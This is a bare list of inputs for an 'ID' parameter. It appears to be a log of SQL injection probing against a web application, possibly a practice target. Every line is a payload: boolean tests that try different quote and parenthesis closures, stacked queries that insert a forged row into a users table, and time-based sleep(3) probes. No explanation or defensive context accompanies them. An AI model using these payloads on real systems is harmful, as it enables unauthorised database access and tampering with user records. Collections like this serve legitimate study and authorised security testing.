ID:1
ID:1
ID:1'
ID:1' and 1=2
ID:1' and 1=2 #
ID:1' and 1=2 #
ID:1' and 1=1 #
ID:1" and 1=2 #
ID:1" and 1=1 #
ID:1") and 1=1 #
ID:1") and 1=1 #
ID:1" and 1=1 #
ID:1' and 1=1 #
ID:1) and 1=1 #
ID:1) and 1=1 #
ID:1 and 1=1 #
ID:1 and 1=1 #
ID:1 and 1=2 #
ID:1 and 1=1 #
ID:1 ;insert into users(id,username,password) values('17','aaa','bbb'); ##
ID:1 ;insert into users(id,username,password) values('17','aaa','bbb'); #
ID:1 ;sleep(3); #
ID:1 ;sleep(3); #
ID:1 ;sleep(3); #
ID:1 ;sleep(3); #
ID:1 ;sleep(3); #
ID:1 ;sleep(3); #
ID:1 ;sleep(3); #
ID:-1 ;sleep(3); #
ID:-1 ;sleep(3); #
ID:-1 ;sleep(3); #
ID:1 ;sleep(3); #
